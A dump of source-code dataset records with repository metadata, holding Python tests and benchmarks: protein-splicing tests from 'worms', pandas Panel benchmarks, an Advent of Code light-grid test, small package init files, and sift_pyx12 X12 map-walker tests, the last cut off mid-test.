2018-02-23T00:52:25.000Z
|
2022-01-26T00:02:32.000Z
|
worms/tests/test_pose_contortions.py
|
abiedermann/worms
|
026c45a88d5c71b0e035ac83de6f4dc107316ed8
|
[
"Apache-2.0"
] | 4
|
2018-06-28T21:30:14.000Z
|
2022-03-30T17:50:42.000Z
|
from functools import partial
import pytest
from worms.segments import Spliceable, Segment
from worms.tests import only_if_pyrosetta
from worms.pose_contortions import reorder_spliced_as_N_to_C
def test_reorder_spliced_as_N_to_C():
    """Exercise reorder_spliced_as_N_to_C over invalid inputs, small
    hand-checked splice tables, and a parametric family of chain lengths.

    As exercised here, the directions string has one character per
    junction: 'N' keeps the joined pair in order, 'C' reverses it.
    """
    Q = reorder_spliced_as_N_to_C

    # Malformed (bodies, directions) combinations must be rejected.
    bad_inputs = [
        ([[1], [1], [1]], "NC"),
        ([[1], [1], [1]], "CN"),
        ([[1, 1], [1], [1, 1]], "CN"),
        ([], "CN"),
        ([], ""),
        ([[]], ""),
    ]
    for bodies, dirns in bad_inputs:
        with pytest.raises(ValueError):
            Q(bodies, dirns)

    # (bodies, directions, expected) — small hand-checked cases.
    table = [
        ([[1]], "", [[1]]),
        ([[1, 2]], "", [[1], [2]]),
        ([[1], [2]], "N", [[1, 2]]),
        ([[1, 2], [3]], "N", [[1], [2, 3]]),
        ([[1, 2], [3, 4]], "N", [[1], [2, 3], [4]]),
        ([[1, 2, 3], [4, 5]], "N", [[1], [2], [3, 4], [5]]),
        ([[1], [2]], "C", [[2, 1]]),
        ([[1, 2], [3]], "C", [[1], [3, 2]]),
        ([[1, 2], [3, 4]], "C", [[1], [3, 2], [4]]),
        ([[1, 2, 3], [4, 5]], "C", [[1], [2], [4, 3], [5]]),
        ([[1], [2], [3]], "NN", [[1, 2, 3]]),
        ([[1], [2], [3, 4]], "NN", [[1, 2, 3], [4]]),
        ([[1], [2, 3], [4, 5]], "NN", [[1, 2], [3, 4], [5]]),
        ([[1, 2], [3, 4], [5, 6]], "NN", [[1], [2, 3], [4, 5], [6]]),
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9]], "NN",
         [[1], [2], [3, 4], [5], [6, 7], [8], [9]]),
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9]], "CN",
         [[1], [2], [4, 3], [5], [6, 7], [8], [9]]),
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9]], "CC",
         [[1], [2], [4, 3], [5], [7, 6], [8], [9]]),
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9]], "NC",
         [[1], [2], [3, 4], [5], [7, 6], [8], [9]]),
    ]
    for bodies, dirns, expected in table:
        assert Q(bodies, dirns) == expected

    # Parametric: n+1 single-entry bodies collapse into one chain
    # (forward for all-'N', reversed for all-'C'), optionally wrapped by
    # multi-entry bodies at either end.
    for n in range(10):
        segs = [[i] for i in range(n + 1)]
        flat = list(range(n + 1))
        assert Q(segs, "N" * n) == [flat]
        assert Q(segs, "C" * n) == [flat[::-1]]
        assert Q([[13, 14]] + segs, "N" * (n + 1)) == [[13], [14] + flat]
        assert Q([[13, 14]] + segs, "C" * (n + 1)) == [[13], flat[::-1] + [14]]
        assert Q([[10, 11, 12]] + segs + [[13, 14, 15]], "N" * (n + 2)) == [
            [10],
            [11],
            [12] + flat + [13],
            [14],
            [15],
        ]
        assert Q([[10, 11, 12]] + segs + [[13, 14, 15]], "C" * (n + 2)) == [
            [10],
            [11],
            [13] + flat[::-1] + [12],
            [14],
            [15],
        ]

    # Longer chains, including single-entry and repeated-entry bodies.
    table_long = [
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "NNN",
         [[1], [2], [3, 4], [5], [6, 7], [8], [9, 0], [1], [2]]),
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "CNN",
         [[1], [2], [4, 3], [5], [6, 7], [8], [9, 0], [1], [2]]),
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "NCN",
         [[1], [2], [3, 4], [5], [7, 6], [8], [9, 0], [1], [2]]),
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "NNC",
         [[1], [2], [3, 4], [5], [6, 7], [8], [0, 9], [1], [2]]),
        ([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, 1, 2]], "NCC",
         [[1], [2], [3, 4], [5], [7, 6], [8], [0, 9], [1], [2]]),
        ([[1, 2, 3], [4, 5, 6], [11], [7, 8, 9], [0, 1, 2]], "NCCC",
         [[1], [2], [3, 4], [5], [7, 11, 6], [8], [0, 9], [1], [2]]),
        ([[1, 2, 3], [4, 5, 6], [11], [12], [7, 8, 9], [0, 1, 2]], "NCCCN",
         [[1], [2], [3, 4], [5], [7, 12, 11, 6], [8], [9, 0], [1], [2]]),
        ([[1, 2, 5, 5, 3], [4, 5, 6], [11], [12], [7, 8, 9], [0, 1, 2]], "NCCCN",
         [[1], [2], [5], [5], [3, 4], [5], [7, 12, 11, 6], [8], [9, 0], [1], [2]]),
    ]
    for bodies, dirns, expected in table_long:
        assert Q(bodies, dirns) == expected
@only_if_pyrosetta
def test_make_pose_chains_dimer(c2pose):
    """make_pose_chains on a two-chain Spliceable, for each entry/exit
    site combination: checks the entry/exit pose sequences, the leftover
    ('rest') chains, and which original dimer chain each boundary pose
    came from."""
    dimer = Spliceable(
        c2pose,
        sites=[("1,2:2", "N"), ("2,3:3", "N"), ("1,-4:-4", "C"), ("2,-5:-5", "C")],
    )
    seq = dimer.body.sequence()[:12]

    def seqs(pose_pairs):
        # Sequence of the pose in each (pose, ...) tuple.
        return [pair[0].sequence() for pair in pose_pairs]

    # N-terminal entry only.
    seg = Segment([dimer], "N", None)
    enex, rest = seg.make_pose_chains(0, pad=(0, 1))
    assert seqs(enex) == [seq[1:], seq]
    assert seqs(rest) == []
    assert enex[-1][0] is dimer.chains[2]
    enex, rest = seg.make_pose_chains(1, pad=(0, 1))
    assert seqs(enex) == [seq[2:], seq]
    assert seqs(rest) == []
    assert enex[-1][0] is dimer.chains[1]

    # C-terminal entry only.
    seg = Segment([dimer], "C", None)
    enex, rest = seg.make_pose_chains(0, pad=(0, 1))
    assert seqs(enex) == [seq[:-3], seq]
    assert seqs(rest) == []
    assert enex[-1][0] is dimer.chains[2]
    enex, rest = seg.make_pose_chains(1, pad=(0, 1))
    assert seqs(enex) == [seq[:-4], seq]
    assert seqs(rest) == []
    assert enex[-1][0] is dimer.chains[1]

    # N-terminal exit only.
    seg = Segment([dimer], None, "N")
    enex, rest = seg.make_pose_chains(0, pad=(0, 1))
    assert seqs(enex) == [seq, seq[1:]]
    assert seqs(rest) == []
    assert enex[0][0] is dimer.chains[2]
    enex, rest = seg.make_pose_chains(1, pad=(0, 1))
    assert seqs(enex) == [seq, seq[2:]]
    assert seqs(rest) == []
    assert enex[0][0] is dimer.chains[1]

    # N entry and N exit: two valid combinations, then out of range.
    seg = Segment([dimer], "N", "N")
    enex, rest = seg.make_pose_chains(0, pad=(0, 1))
    assert seqs(enex) == [seq[1:], seq[2:]]
    assert seqs(rest) == []
    enex, rest = seg.make_pose_chains(1, pad=(0, 1))
    assert seqs(enex) == [seq[2:], seq[1:]]
    assert seqs(rest) == []
    with pytest.raises(IndexError):
        enex, rest = seg.make_pose_chains(2, pad=(0, 1))

    # N entry and C exit: four valid combinations, then out of range.
    seg = Segment([dimer], "N", "C")
    enex, rest = seg.make_pose_chains(0, pad=(0, 1))
    assert seqs(enex) == [seq[1:-3]]
    assert seqs(rest) == [seq]
    assert rest[0][0] is dimer.chains[2]
    enex, rest = seg.make_pose_chains(1, pad=(0, 1))
    assert seqs(enex) == [seq[1:], seq[:-4]]
    assert seqs(rest) == []
    enex, rest = seg.make_pose_chains(2, pad=(0, 1))
    assert seqs(enex) == [seq[2:], seq[:-3]]
    assert seqs(rest) == []
    enex, rest = seg.make_pose_chains(3, pad=(0, 1))
    assert seqs(enex) == [seq[2:-4]]
    assert seqs(rest) == [seq]
    assert rest[0][0] is dimer.chains[1]
    with pytest.raises(IndexError):
        enex, rest = seg.make_pose_chains(4, pad=(0, 1))
| 28.5
| 96
| 0.410986
| 1,143
| 6,954
| 2.454068
| 0.067367
| 0.045633
| 0.038503
| 0.044207
| 0.836364
| 0.799287
| 0.754367
| 0.74082
| 0.703387
| 0.635294
| 0
| 0.121886
| 0.301553
| 6,954
| 243
| 97
| 28.617284
| 0.455631
| 0
| 0
| 0.580786
| 0
| 0
| 0.015531
| 0
| 0
| 0
| 0
| 0
| 0.279476
| 1
| 0.008734
| false
| 0
| 0.021834
| 0
| 0.030568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b0b2148c60fcc1bc1776363e3c2b2eadf3f3486
| 84
|
py
|
Python
|
source/AI/KI_testing/test_game_ai/framework_tutorial-master/gym_game/envs/__init__.py
|
JonasHimmetsbergerStudent/ScribbleFight
|
b896a152b26fde5a57cd72cea074c952c4ea0de9
|
[
"MIT"
] | null | null | null |
source/AI/KI_testing/test_game_ai/framework_tutorial-master/gym_game/envs/__init__.py
|
JonasHimmetsbergerStudent/ScribbleFight
|
b896a152b26fde5a57cd72cea074c952c4ea0de9
|
[
"MIT"
] | 3
|
2021-07-09T21:32:37.000Z
|
2021-07-09T21:55:02.000Z
|
PyRacing1/gym_game/envs/__init__.py
|
CeVauDe/bugfree-game-about-bugs
|
ff1b3e07188fca1775fcc1ce95b59b188c29cee2
|
[
"MIT"
] | null | null | null |
from gym_game.envs.custom_env import *
from gym_game.envs.pygame_2d import PyGame2D
| 28
| 44
| 0.845238
| 15
| 84
| 4.466667
| 0.666667
| 0.208955
| 0.328358
| 0.447761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.026316
| 0.095238
| 84
| 2
| 45
| 42
| 0.855263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0b0e73847aa96a20fc1c98841784609b75698088
| 2,375
|
py
|
Python
|
asv_bench/benchmarks/panel_ctor.py
|
springcoil/pandas
|
945075ad78cef652039feb50d60092b0580604e6
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 2
|
2017-05-07T02:08:12.000Z
|
2017-12-14T01:47:47.000Z
|
asv_bench/benchmarks/panel_ctor.py
|
springcoil/pandas
|
945075ad78cef652039feb50d60092b0580604e6
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2016-09-30T11:15:32.000Z
|
2016-09-30T11:15:32.000Z
|
asv_bench/benchmarks/panel_ctor.py
|
springcoil/pandas
|
945075ad78cef652039feb50d60092b0580604e6
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2018-12-30T14:53:50.000Z
|
2018-12-30T14:53:50.000Z
|
from .pandas_vb_common import *
class panel_from_dict_all_different_indexes(object):
    """ASV benchmark: Panel.from_dict where every frame carries a
    different DatetimeIndex (the end date advances one day per frame)."""
    goal_time = 0.2

    def setup(self):
        self.data_frames = {}
        self.start = datetime(1990, 1, 1)
        self.end = datetime(2012, 1, 1)
        for i in range(100):
            self.end += timedelta(days=1)
            self.dr = np.asarray(date_range(self.start, self.end))
            n = len(self.dr)
            self.df = DataFrame({'a': ([0] * n), 'b': ([1] * n), 'c': ([2] * n), }, index=self.dr)
            self.data_frames[i] = self.df

    def time_panel_from_dict_all_different_indexes(self):
        Panel.from_dict(self.data_frames)
class panel_from_dict_equiv_indexes(object):
    """ASV benchmark: Panel.from_dict where the 100 frames hold equal
    but separately constructed DatetimeIndex objects."""
    goal_time = 0.2

    def setup(self):
        self.data_frames = {}
        for i in range(100):
            self.dr = np.asarray(DatetimeIndex(start=datetime(1990, 1, 1), end=datetime(2012, 1, 1), freq=datetools.Day(1)))
            n = len(self.dr)
            self.df = DataFrame({'a': ([0] * n), 'b': ([1] * n), 'c': ([2] * n), }, index=self.dr)
            self.data_frames[i] = self.df

    def time_panel_from_dict_equiv_indexes(self):
        Panel.from_dict(self.data_frames)
class panel_from_dict_same_index(object):
    """ASV benchmark: Panel.from_dict where all 100 frames share one
    DatetimeIndex object."""
    goal_time = 0.2

    def setup(self):
        self.dr = np.asarray(DatetimeIndex(start=datetime(1990, 1, 1), end=datetime(2012, 1, 1), freq=datetools.Day(1)))
        # Index is fixed, so its length can be computed once.
        n = len(self.dr)
        self.data_frames = {}
        for i in range(100):
            self.df = DataFrame({'a': ([0] * n), 'b': ([1] * n), 'c': ([2] * n), }, index=self.dr)
            self.data_frames[i] = self.df

    def time_panel_from_dict_same_index(self):
        Panel.from_dict(self.data_frames)
class panel_from_dict_two_different_indexes(object):
    """ASV benchmark: Panel.from_dict where the index changes exactly
    once — frames 0-49 share one index, frames 50-99 a one-day-longer
    one."""
    goal_time = 0.2

    def setup(self):
        self.data_frames = {}
        self.start = datetime(1990, 1, 1)
        self.end = datetime(2012, 1, 1)
        for i in range(100):
            if i == 50:
                # Halfway through, extend the range by a single day.
                self.end += timedelta(days=1)
            self.dr = np.asarray(date_range(self.start, self.end))
            n = len(self.dr)
            self.df = DataFrame({'a': ([0] * n), 'b': ([1] * n), 'c': ([2] * n), }, index=self.dr)
            self.data_frames[i] = self.df

    def time_panel_from_dict_two_different_indexes(self):
        Panel.from_dict(self.data_frames)
| 37.109375
| 131
| 0.590737
| 356
| 2,375
| 3.761236
| 0.151685
| 0.089619
| 0.116505
| 0.053771
| 0.974608
| 0.953697
| 0.935026
| 0.935026
| 0.935026
| 0.843913
| 0
| 0.047778
| 0.242105
| 2,375
| 64
| 132
| 37.109375
| 0.696111
| 0
| 0
| 0.791667
| 0
| 0
| 0.005051
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.020833
| 0
| 0.354167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9beb2c1f2392c8473194753b1eeb383bc5075390
| 1,995
|
py
|
Python
|
tests/test_grid.py
|
elizabrock/adventofcode
|
542d86df55696e60b9044a468d9231650b93594c
|
[
"MIT"
] | null | null | null |
tests/test_grid.py
|
elizabrock/adventofcode
|
542d86df55696e60b9044a468d9231650b93594c
|
[
"MIT"
] | null | null | null |
tests/test_grid.py
|
elizabrock/adventofcode
|
542d86df55696e60b9044a468d9231650b93594c
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from day6 import Grid
class TestGrid(TestCase):
    """day6.Grid behaviour: toggle/turn_on/turn_off act on inclusive
    rectangular regions and lights_on_count() tracks the lit total."""

    def _expect_on(self, grid, count):
        # Single place to compare the lit-light count; assertEqual keeps
        # unittest's failure reporting.
        self.assertEqual(count, grid.lights_on_count())

    def test_lights_start_out_off(self):
        self._expect_on(Grid(), 0)

    def test_toggle_one_light(self):
        grid = Grid()
        self._expect_on(grid, 0)
        grid.toggle(0, 0, 0, 0)
        self._expect_on(grid, 1)
        grid.toggle(0, 0, 0, 0)
        self._expect_on(grid, 0)

    def test_toggle_multiple_light(self):
        grid = Grid()
        self._expect_on(grid, 0)
        grid.toggle(0, 0, 4, 4)  # 5x5 block lit (bounds are inclusive)
        self._expect_on(grid, 25)
        grid.toggle(0, 0, 2, 2)  # 3x3 corner flipped back off
        self._expect_on(grid, 16)

    def test_turn_on_one_light(self):
        grid = Grid()
        self._expect_on(grid, 0)
        grid.turn_on(0, 0, 0, 0)
        self._expect_on(grid, 1)
        grid.turn_on(0, 0, 0, 0)  # turning on an already-lit light is a no-op
        self._expect_on(grid, 1)

    def test_turn_on_multiple_light(self):
        grid = Grid()
        self._expect_on(grid, 0)
        grid.turn_on(0, 0, 0, 0)
        self._expect_on(grid, 1)
        grid.turn_on(0, 0, 4, 4)  # superset region: total is 25, not 26
        self._expect_on(grid, 25)

    def test_turn_off_one_light(self):
        grid = Grid()
        self._expect_on(grid, 0)
        grid.turn_on(0, 0, 0, 0)
        self._expect_on(grid, 1)
        grid.turn_off(0, 0, 0, 0)
        self._expect_on(grid, 0)
        grid.turn_off(0, 0, 0, 0)  # turning off an unlit light is a no-op
        self._expect_on(grid, 0)

    def test_turn_off_multiple_light(self):
        grid = Grid()
        self._expect_on(grid, 0)
        grid.turn_on(0, 0, 4, 4)
        self._expect_on(grid, 25)
        grid.turn_off(0, 0, 1, 1)  # 2x2 corner off: 25 - 4
        self._expect_on(grid, 21)
| 35
| 52
| 0.622055
| 299
| 1,995
| 3.899666
| 0.100334
| 0.049743
| 0.205832
| 0.291595
| 0.876501
| 0.876501
| 0.876501
| 0.876501
| 0.814751
| 0.807033
| 0
| 0.051862
| 0.246115
| 1,995
| 57
| 53
| 35
| 0.723404
| 0
| 0
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.14
| false
| 0
| 0.04
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
50512dbe4c53402d2adeefe63cc029540803985a
| 98
|
py
|
Python
|
minesweeper/agents/__init__.py
|
MathisFederico/Minesweeper
|
b66b41066e325813b24497d2caca0a11c048e18b
|
[
"MIT"
] | 1
|
2020-12-23T11:52:40.000Z
|
2020-12-23T11:52:40.000Z
|
minesweeper/agents/__init__.py
|
MathisFederico/Minesweeper
|
b66b41066e325813b24497d2caca0a11c048e18b
|
[
"MIT"
] | null | null | null |
minesweeper/agents/__init__.py
|
MathisFederico/Minesweeper
|
b66b41066e325813b24497d2caca0a11c048e18b
|
[
"MIT"
] | null | null | null |
from minesweeper.agents.random import RandomAgent
from minesweeper.agents.human import HumanAgent
| 32.666667
| 49
| 0.877551
| 12
| 98
| 7.166667
| 0.666667
| 0.348837
| 0.488372
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 98
| 2
| 50
| 49
| 0.955556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
50564d9667feda8f80eb1aa984752c032acd1f00
| 36,783
|
py
|
Python
|
sift_pyx12/test/test_map_walker.py
|
sifthealthcare/sift-pyx12
|
97b38fd8b681f149570ac9d5cae0fe868a7722f2
|
[
"BSD-3-Clause"
] | null | null | null |
sift_pyx12/test/test_map_walker.py
|
sifthealthcare/sift-pyx12
|
97b38fd8b681f149570ac9d5cae0fe868a7722f2
|
[
"BSD-3-Clause"
] | 2
|
2021-11-12T18:35:11.000Z
|
2021-11-12T18:35:31.000Z
|
sift_pyx12/test/test_map_walker.py
|
sifthealthcare/sift-pyx12
|
97b38fd8b681f149570ac9d5cae0fe868a7722f2
|
[
"BSD-3-Clause"
] | null | null | null |
import unittest
import sift_pyx12.error_handler
from sift_pyx12.map_walker import walk_tree, get_id_list, traverse_path, pop_to_parent_loop
import sift_pyx12.map_if
import sift_pyx12.params
import sift_pyx12.path
import sift_pyx12.segment
class Explicit_Loops(unittest.TestCase):
    """Walk the 837 4010 X098 map across the explicit envelope segments
    (ISA/GS/ST/SE/GE/IEA) and verify, for each transition, the matched
    node plus the loop IDs popped and pushed."""

    def setUp(self):
        self.walker = walk_tree()
        param = sift_pyx12.params.params()
        self.map = sift_pyx12.map_if.load_map_file('837.4010.X098.A1.xml', param)
        self.errh = sift_pyx12.error_handler.errh_null()

    def tearDown(self):
        del self.errh
        del self.map
        del self.walker

    @staticmethod
    def _seg(raw):
        # X12 segment with the delimiters used throughout these tests:
        # segment '~', element '*', component ':'.
        return sift_pyx12.segment.Segment(raw, '~', '*', ':')

    def _advance(self, start, raw):
        """Reset the error handler and take one walker step from *start*
        over segment text *raw*; returns (node, pop, push, seg)."""
        self.errh.reset()
        seg = self._seg(raw)
        node, pop, push = self.walker.walk(start, seg, self.errh, 5, 4, None)
        return node, pop, push, seg

    def test_ISA_to_GS(self):
        start = self.map.getnodebypath('/ISA_LOOP/ISA')
        self.assertNotEqual(start, None, 'node not found')
        node, pop, push, seg = self._advance(start, 'GS*HC')
        self.assertNotEqual(node, None, 'walker failed')
        self.assertEqual(seg.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), ['GS_LOOP'])

    def test_GS_to_ST(self):
        start = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/GS')
        node, pop, push, seg = self._advance(start, 'ST*837')
        self.assertNotEqual(node, None)
        self.assertEqual(seg.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), ['ST_LOOP'])

    def test_SE_to_ST(self):
        # SE closes a transaction set; the next ST pops and re-pushes
        # the ST_LOOP.
        start = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/SE')
        self.assertNotEqual(start, None)
        node, pop, push, seg = self._advance(start, 'ST*837')
        self.assertEqual(seg.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), ['ST_LOOP'])
        self.assertEqual(get_id_list(push), ['ST_LOOP'])

    def test_SE_to_GE(self):
        start = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/SE')
        node, pop, push, seg = self._advance(start, 'GE*1')
        self.assertNotEqual(node, None)
        self.assertEqual(seg.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), ['ST_LOOP'])
        self.assertEqual(get_id_list(push), [])

    def test_GE_to_GS(self):
        start = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/GE')
        node, pop, push, seg = self._advance(start, 'GS*HC')
        self.assertNotEqual(node, None)
        self.assertEqual(seg.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), ['GS_LOOP'])
        self.assertEqual(get_id_list(push), ['GS_LOOP'])

    def test_GE_to_IEA(self):
        start = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/GE')
        self.assertEqual('GE', start.id)
        node, pop, push, seg = self._advance(start, 'IEA*1')
        self.assertNotEqual(node, None)
        self.assertEqual(seg.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), ['GS_LOOP'])
        self.assertEqual(get_id_list(push), [])

    def test_IEA_to_ISA(self):
        start = self.map.getnodebypath('/ISA_LOOP/IEA')
        self.assertEqual('IEA', start.id)
        node, pop, push, seg = self._advance(start, 'ISA*00')
        self.assertNotEqual(node, None)
        self.assertEqual(seg.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), ['ISA_LOOP'])
        self.assertEqual(get_id_list(push), ['ISA_LOOP'])

    def test_ST_to_BHT_fail(self):
        # An unknown segment ID must not match any node, and no loops
        # move.
        start = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/ST')
        node, pop, push, _ = self._advance(start, 'ZZZ*0019')
        self.assertEqual(node, None)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), [])

    def test_GS_to_ST_277(self):
        # Same GS -> ST transition, but against the 5010 277 map and
        # with locally constructed walker/map/error-handler.
        param = sift_pyx12.params.params()
        cmap = sift_pyx12.map_if.load_map_file('277.5010.X214.xml', param)
        errh = sift_pyx12.error_handler.errh_null()
        errh.reset()
        walker = walk_tree()
        start = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/GS')
        seg = self._seg('ST*277*0001*005010X214')
        node, pop, push = walker.walk(start, seg, errh, 5, 4, None)
        self.assertNotEqual(node, None)
        self.assertEqual(seg.get_seg_id(), node.id)
        self.assertEqual(get_id_list(pop), [])
        self.assertEqual(get_id_list(push), ['ST_LOOP'])
class Implicit_Loops(unittest.TestCase):
"""
TA1 segment
child loop
next sibling loop
end loop - goto parent loop
start at loop node
start at segment node
start at element/composite node?
MATCH HL segment
FAIL - loop repeat exceeds max count
OK - loop repeat does not exceed max count
"""
def setUp(self):
self.walker = walk_tree()
self.param = sift_pyx12.params.params()
self.map = sift_pyx12.map_if.load_map_file(
'837.4010.X098.A1.xml', self.param)
self.errh = sift_pyx12.error_handler.errh_null()
def test_ST_to_BHT(self):
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/ST')
seg_data = sift_pyx12.segment.Segment('BHT*0019', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['HEADER'])
def xtest_repeat_loop_with_one_segment(self):
cmap = sift_pyx12.map_if.load_map_file('841.4010.XXXC.xml', self.param)
node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000/2100/SPI')
self.assertNotEqual(node, None, 'Node not found')
start_node = node
#node.cur_count = 1
self.walker.setCountState({node.x12path: 1})
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('SPI*00', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None, 'walker failed')
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2100'])
self.assertEqual(get_id_list(push), ['2100'])
self.assertEqual(traverse_path(start_node, pop, push), pop_to_parent_loop(node).get_path())
def test_repeat_loop_with_one_segment_EQ(self):
#errh = sift_pyx12.error_handler.errh_null()
cmap = sift_pyx12.map_if.load_map_file('270.4010.X092.A1.xml', self.param)
node = cmap.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/2000B/2000C/2100C/2110C/EQ')
start_node = node
self.assertNotEqual(node, None, 'Node not found')
#node.cur_count = 1
self.walker.setCountState({node.x12path: 1})
seg_data = sift_pyx12.segment.Segment('EQ*30**CHD', '~', '*', ':')
self.errh.reset()
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
self.assertNotEqual(node, None, 'walker failed')
self.assertEqual(seg_data.get_seg_id(), node.id)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2110C'])
self.assertEqual(get_id_list(push), ['2110C'])
self.assertEqual(traverse_path(start_node, pop, push),
pop_to_parent_loop(node).get_path())
def test_loop_required_fail1(self):
"""
Test for skipped /2000A/2010AA/NM1 segment - first segment of loop
"""
self.errh.reset()
node = self.map.getnodebypath(
'/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A/HL')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'segment')
seg_data = sift_pyx12.segment.Segment('HL*1**20*1~', '~', '*', ':')
result = node.is_valid(seg_data, self.errh)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.walker.setCountState({node.x12path: 1})
self.errh.reset()
seg_data = sift_pyx12.segment.Segment('HL*2*1*22*0~', '~', '*', ':')
(node, pop, push) = self.walker.walk(node, seg_data, self.errh, 5, 4, None)
#result = node.is_valid(seg_data, self.errh)
#self.assertFalse(result)
self.assertEqual(self.errh.err_cde, '3', self.errh.err_str)
self.assertEqual(get_id_list(pop), [])
self.assertEqual(get_id_list(push), ['2000B'])
def test_match_loop_by_hl_ok(self):
"""
MATCH loop by HL segment
"""
self.errh.reset()
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'loop')
seg_data = sift_pyx12.segment.Segment('HL*1**20*1~', '~', '*', ':')
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
result = node.is_valid(seg_data, self.errh)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2000A'])
self.assertEqual(get_id_list(push), ['2000A'])
def test_loop_required_ok1(self):
"""
MATCH loop by first segment
Test for found /2000A/2010AA/NM1 segment
"""
node = self.map.getnodebypath('/ISA_LOOP/GS_LOOP/ST_LOOP/DETAIL/2000A')
self.assertNotEqual(node, None)
self.assertEqual(node.base_name, 'loop')
seg_data = sift_pyx12.segment.Segment('HL*1**20*1~', '~', '*', ':')
self.errh.reset()
(node, pop, push) = self.walker.walk(
node, seg_data, self.errh, 5, 4, None)
result = node.is_valid(seg_data, self.errh)
self.assertEqual(self.errh.err_cde, None, self.errh.err_str)
self.assertEqual(get_id_list(pop), ['2000A'])
